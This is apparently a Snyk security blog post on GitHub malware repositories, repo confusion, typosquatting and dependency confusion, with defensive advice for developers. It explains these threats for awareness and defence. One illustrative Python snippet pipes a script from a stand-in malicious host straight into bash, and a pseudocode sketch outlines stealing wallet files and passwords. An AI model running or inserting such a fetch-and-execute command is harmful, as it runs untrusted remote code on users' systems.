GitHub “besieged” by malware repositories and repo confusion: Why you'll be ok

Escrito por:

March 12, 2024

0 minutos de leitura

As open source software development continues to evolve, so does its susceptibility to cybersecurity threats. One such instance is the recent discovery of malware repositories on GitHub. In this cybersecurity attack, threat actors managed to upload malicious code onto GitHub, a platform that hosts millions of code repositories and is used by developers worldwide.

These GitHub malware repositories are not just a threat to individual developers but also to organizations at large. When the malicious repositories are cloned, or their code is incorporated into other projects, the malware can spread, leading to potential data breaches or system compromises. We’ve covered related threats like typosquatting and dependency confusion in previous Snyk blogs, and by following generally accepted best practices, you can avoid these kinds of dangers. We’ve reiterated those best practices below, along with some Snyk tools like Snyk Advisor and Snyk Learn. We then dive deeper into this specific GitHub attack. It is worth noting that this type of attack is not necessarily limited to GitHub. Any source code repository system where code can be shared and copied openly could host this kind of malicious code.

# Example of a potentially harmful code snippet in a repository
def malicious_function():
    import os
    os.system('curl https://malicious-website.com/malware_script.sh | bash')

The above hypothetical Python function, when executed, can run a shell command to download and execute a malicious script from an external server. This underlines the importance of scrutinizing code from external repositories.

Protecting yourself and your team from malware on GitHub: Best practices and security hygiene

In an era where open-source software development is the norm, and GitHub repositories serve as a gold mine of reusable code, it becomes increasingly crucial to ensure the security hygiene of the code we consume. This section goes into the importance of vetting code repositories, authenticating repository authority, the perils of cloning malicious repositories, and guidelines for security teams to prepare their developers.

Vetting code repositories

In software development, the vetting process of code repositories is a crucial step that should not be underestimated. By thoroughly vetting repositories, developers can avoid integrating potentially malicious code into their projects. GitHub, for instance, hosts a vast number of repositories, and it's not uncommon to find malware disguised as useful code.

It's essential to review the code thoroughly before incorporating it into your project. This includes checking the repository's history, contributors, and existing issues. Repositories with a single contributor, short history, or unresolved security issues should be treated with caution.

In the space of vetting open source libraries and software packages on npm, PyPI, RubyGems, and other package registries, developers are highly recommended to use the Snyk Advisor web tool, which provides a health score for open source packages and libraries, including their security posture, maintenance status, and licensing.

The Snyk Advisor tool providing developers with a package health score for the keras Python package on PyPI.

Guidelines for security teams to prepare their developer teams

Security teams play a pivotal role in ensuring the safety of the development environment. Here are some guidelines for security teams:

Educate developers: Conduct regular workshops or training sessions on the importance of code vetting, repository legitimacy checks, and open source supply chain security attacks such as typosquatting and dependency confusion.
Implement security tools: Utilize security tools that can automatically scan repositories for known vulnerabilities or suspicious activity.
Establish a secure coding practice: Promote secure coding practices within the team. This could involve peer code reviews, using linters with security rules, and regular audits.
Incident response plan: Have an incident response plan in place if a security breach occurs due to a malicious repository.

By following these best practices and maintaining good security hygiene, you can safeguard your software development process from threats lurking in GitHub repositories.

Understanding repo confusion

The term "repo confusion" is a strategy used by attackers in this context. It involves the creation of repositories with names similar to those of existing, legitimate projects. The aim is to trick developers into using the wrong repository, leading them to inadvertently download and execute the malicious code.

For example, if there is a popular repository named legitimate_repo, an attacker might create a repository named legitimate-repo or legitimate_repo1. Unsuspecting developers might confuse these for the original and clone them, not knowing they are falling into a trap. Another common variation, reflected in the GitHub malware repositories incidents, is when attacks use a forked version of a popular repository and push it as a new repository.

Malware attacks, typosquatting, and dependency confusion attacks

Repo confusion is closely related to two other cybersecurity threats: typosquatting and dependency confusion attacks. Typosquatting refers to the practice of registering domain names similar to popular ones, or publishing packages to open source registries like npm and PyPI, hoping to exploit developers who mistype the URL or the package name when they come to install them. In the context of GitHub, this might mean creating repositories with names very similar to popular ones — only a character off, or under a different account name, in which the repository name is the same as a popular one.

Dependency confusion attacks, on the other hand, leverage the way package managers handle dependencies. If a software project depends on a package that is not found in the public package repository but is available in a private one, an attacker can create a package with the same name in the public repository. The package manager might then download the malicious package instead of the legitimate one.

// Example of a potentially dangerous package.json file
{
  "name": "legitimate-package",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "start": "node index.js"
  },
  "dependencies": {
    "private-package": "^1.0.0"
  }
}

In the above example, if private-package does not exist in the public npm registry but a malicious version of it has been published there by an attacker, running npm install could result in the download and installation of the malicious package.

The GitHub malware repositories attack, coupled with repo confusion, typosquatting, and dependency confusion attacks, poses a serious threat to the security of open source software development. It underscores the need for developers to exercise caution when using third-party code and to adopt robust cybersecurity measures.

Understanding the GitHub malware repositories attack

What happened with the GitHub malicious repositories attack? Let's explore the specifics of this GitHub incident, a method of infiltrating software developers' workstations. We will examine how the attack took place, the tactics employed by the attackers, and the potential harm caused.

The first recorded instance of this attack was traced back to February 28th, 2024. In a seemingly innocuous event, an anonymous user forked a popular open source repository and pushed it as a new repository. However, it was soon revealed that the newly pushed repo was not as harmless as it first appeared.

The perpetrators had embedded obfuscated malware within the codebase, effectively turning the repository into a minefield of malicious code. The unsuspecting developers who cloned or forked these repositories unknowingly introduced the malware into their local systems.

Attackers' method: Forking and pushing malware-infused code repositories

The attackers used a clever and subtle technique. They forked existing open source code repositories, which is a common practice among developers intending to contribute to an open source project. However, the attackers then added obfuscated malicious code into these repositories.

Following is an example of forking and creating a new repository:

git clone https://github.com/original/repo.git
cd repo
git remote rename origin upstream

In the normal forking process illustrated above, the attacker would add the malicious code at this stage and then push the repository back to GitHub.

git add .
git commit -m "Add new feature"
git push origin master

The obfuscated malware was designed in such a way that it would be difficult to detect by the traditional code review process. By the time the malicious code was discovered, it had already infected a number of developer systems.

Potential harm: Stealing cryptocurrency and passwords

The main objective of the embedded malware was to steal sensitive information from the infected devices. Specifically, the malware targeted cryptocurrency wallets and passwords stored on the developers' systems.

Once the malware was on the system, it would look for specific files related to cryptocurrency wallets, such as Bitcoin and Ethereum, and transmit these back to the attacker. Similarly, it would also attempt to steal passwords stored in plaintext or in weakly encrypted formats.

Following is a simplified pseudocode representation of the malware's objectives:

def infiltrate_system():
    steal_files('*.wallet')
    steal_passwords()

def steal_files(file_pattern):
    # method to find and transmit wallet files

def steal_passwords():
    # method to find and transmit passwords

The above pseudocode gives a simplified idea of what the malware might do once it has infiltrated a system.

The GitHub malware repositories attack serves as a stark reminder of the importance of stringent security measures in software development and the potential dangers lurking in the open source landscape. As developers and security professionals, we need to stay vigilant and use best practices to prevent such attacks.

Typosquatting and dependency confusion attacks: A close relative

In relation to the GitHub malware attacks, we get to know two other common yet menacing cybersecurity threats — typosquatting and dependency confusion attacks. Both of these attacks share a close relationship with the recently discovered GitHub malware repositories attack. In order to thoroughly understand their connection and the potential risk they pose, we'll begin by defining these concepts and later examine some real-world instances where these attacks were successfully executed.

Definition of typosquatting and dependency confusion attacks

Typosquatting, in relation to code repositories and open source software, is a form of cybersecurity attack that targets developers who incorrectly type a library name when installing packages. For example, npm install riact-dom instead of npm install react-dom. The attackers create malicious packages with names similar to popular ones and wait for developers to make typos. Once developers install these malicious packages, attackers can steal sensitive information or inject malware into the developer's system.

On the other hand, a dependency confusion attack is a type of supply chain attack that targets open source software development processes. In this attack, a hacker creates a malicious package with the same name as a private package used in a project's development environment. When the project's build system fetches dependencies, it mistakenly picks up the malicious public package, thinking it's the private one. This allows malicious code to enter and infect the project's codebase.

# Malicious package with same name as private package
# This is a Python example, but the attack extends to other languages (Node.js, Ruby, etc.)
def malicious_function():
    # This function could do anything: steal data, corrupt files, etc.

Real-life examples of typosquatting and dependency confusion attacks

One of the most prominent examples of typosquatting was the attack on the official Python package repository, PyPI, in 2017. Attackers uploaded malicious packages with names very similar to popular ones, affecting thousands of users who accidentally installed these packages.

A recent example of a dependency confusion attack was discovered by security researcher Alex Birsan. He exploited this vulnerability in various high-profile companies, including Apple, Microsoft, and PayPal, by injecting his own code into their internal systems. He created malicious packages with the same names as the private packages these companies were using and uploaded them to public package repositories. When the companies' build systems fetched the packages, they inadvertently used Birsan's malicious packages, thereby allowing his code to run within their systems.

In conclusion, both typosquatting and dependency confusion attacks pose a significant threat to open source software development. It's crucial for developers and organizations to be aware of these attack vectors and implement appropriate measures to safeguard their systems and codebases.

Conclusion

To summarize, we've explored the issue of malware repositories on GitHub and how they can exploit common vulnerabilities in open source security. Specifically, we discussed how these repositories can leverage tactics like typosquatting and dependency confusion attacks to infiltrate unsuspecting systems.

As developers and security professionals, we are the first line of defense against these kinds of cybersecurity threats. It's crucial that we adhere to best practices and maintain good security hygiene to protect our code and systems.

Implementing a few key strategies can go a long way in protecting against these threats:

Always verify the integrity of repositories and packages before using them. This can be as simple as checking the username of the repository owner or as complex as verifying the cryptographic signatures of packages.
Be vigilant of typographical errors when cloning repositories or installing packages.
Use private package feeds for internal packages to reduce the risk of dependency confusion attacks.
Regularly update and patch your systems to protect against known vulnerabilities.